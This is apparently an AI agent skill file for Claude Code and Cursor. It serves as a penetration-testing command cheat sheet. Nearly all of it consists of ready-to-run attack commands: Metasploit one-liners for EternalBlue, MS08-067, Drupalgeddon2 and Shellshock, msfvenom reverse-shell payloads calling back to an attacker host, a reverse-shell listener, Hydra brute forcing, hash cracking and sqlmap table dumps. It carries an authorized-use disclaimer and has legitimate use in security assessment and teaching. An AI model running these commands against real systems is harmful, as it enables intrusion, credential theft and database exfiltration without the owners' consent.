
About
A comprehensive command reference for penetration testing tools, covering network scanning, exploitation, password cracking and web application testing. Supports quick command lookup during security assessments.
name: pentest-commands
description: "Provides a comprehensive command reference for penetration testing tools, covering network scanning, exploitation, password cracking and web application testing. Enables quick command lookup during security assessments."
risk: offensive
source: community
author: zebbern
date_added: "2026-02-27"
Authorized use only: this skill is intended solely for authorized security assessments, defensive validation, or controlled educational environments.
Penetration Testing Commands
Purpose
Provides a comprehensive command reference for penetration testing tools, covering network scanning, exploitation, password cracking and web application testing. Enables quick command lookup during security assessments.
Inputs / Prerequisites
- Kali Linux or another penetration testing distribution
- Authorized target IP addresses
- Wordlist files for brute forcing
- Network access to the target systems
- Basic understanding of the tools' syntax
Outputs / Deliverables
- Network enumeration results
- Identified vulnerabilities
- Exploitation payloads
- Cracked credentials
- Web vulnerability findings
Core Workflow
1. Nmap Commands
Host discovery:
# Ping sweep
nmap -sP 192.168.1.0/24
# List IPs without scanning
nmap -sL 192.168.1.0/24
# Ping scan (host discovery)
nmap -sn 192.168.1.0/24
Port scanning:
# TCP SYN scan (stealth)
nmap -sS 192.168.1.1
# Full TCP connect scan
nmap -sT 192.168.1.1
# UDP scan
nmap -sU 192.168.1.1
# All ports (1-65535)
nmap -p- 192.168.1.1
# Specific ports
nmap -p 22,80,443 192.168.1.1
Service detection:
# Service versions
nmap -sV 192.168.1.1
# OS detection
nmap -O 192.168.1.1
# Comprehensive scan
nmap -A 192.168.1.1
# Skip host discovery
nmap -Pn 192.168.1.1
NSE scripts:
# Vulnerability scan
nmap --script vuln 192.168.1.1
# SMB enumeration
nmap --script smb-enum-shares -p 445 192.168.1.1
# HTTP enumeration
nmap --script http-enum -p 80 192.168.1.1
# Check EternalBlue
nmap --script smb-vuln-ms17-010 192.168.1.1
# Check MS08-067
nmap --script smb-vuln-ms08-067 192.168.1.1
# SSH brute force
nmap --script ssh-brute -p 22 192.168.1.1
# FTP anonymous
nmap --script ftp-anon 192.168.1.1
# DNS brute force
nmap --script dns-brute 192.168.1.1
# HTTP methods
nmap -p80 --script http-methods 192.168.1.1
# HTTP headers
nmap -p80 --script http-headers 192.168.1.1
# SQL injection check
nmap --script http-sql-injection -p 80 192.168.1.1
Advanced scans:
# Xmas scan
nmap -sX 192.168.1.1
# ACK scan (firewall detection)
nmap -sA 192.168.1.1
# Window scan
nmap -sW 192.168.1.1
# Traceroute
nmap --traceroute 192.168.1.1
2. Metasploit Commands
Basic usage:
# Launch Metasploit
msfconsole
# Search for exploits
search type:exploit name:smb
# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
# Show options
show options
# Set target
set RHOST 192.168.1.1
# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp
# Run exploit
exploit
Common exploits:
# EternalBlue
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
# MS08-067 (Conficker)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"
# vsftpd backdoor
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"
# Shellshock
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"
# Drupalgeddon2
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"
# PSExec
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
Scanners:
# TCP port scan
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"
# SMB version scan
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"
# SMB share enumeration
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"
# SSH brute force
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# FTP brute force
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# RDP scanning
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
Handler setup:
# Multi-handler for reverse shells
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
Payload generation (msfvenom):
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
# PHP reverse shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
# Python reverse shell
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw
# ASP reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp
# WAR reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war
3. Password Cracking
Hydra:
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# FTP brute force
hydra -L users.txt -P passwords.txt ftp://192.168.1.1
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
John the Ripper:
# Crack shadow file
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
# Show cracked passwords
john --show shadow.txt
Hashcat:
# MD5
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
# SHA256
hashcat -m 1400 hashes.txt /usr/share/wordlists/rockyou.txt
# NTLM
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
4. Web Application Testing
Directory enumeration:
# Gobuster
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt
# Dirb
dirb http://192.168.1.1 /usr/share/wordlists/dirb/common.txt
# Nikto
nikto -h http://192.168.1.1
SQL injection (sqlmap):
# Basic test
sqlmap -u "http://192.168.1.1/page?id=1" --dbs
# Dump database
sqlmap -u "http://192.168.1.1/page?id=1" -D dbname --tables
# Dump table
sqlmap -u "http://192.168.1.1/page?id=1" -D dbname -T users --dump
Compatible tools
Claude Code, Cursor
Tags
Security
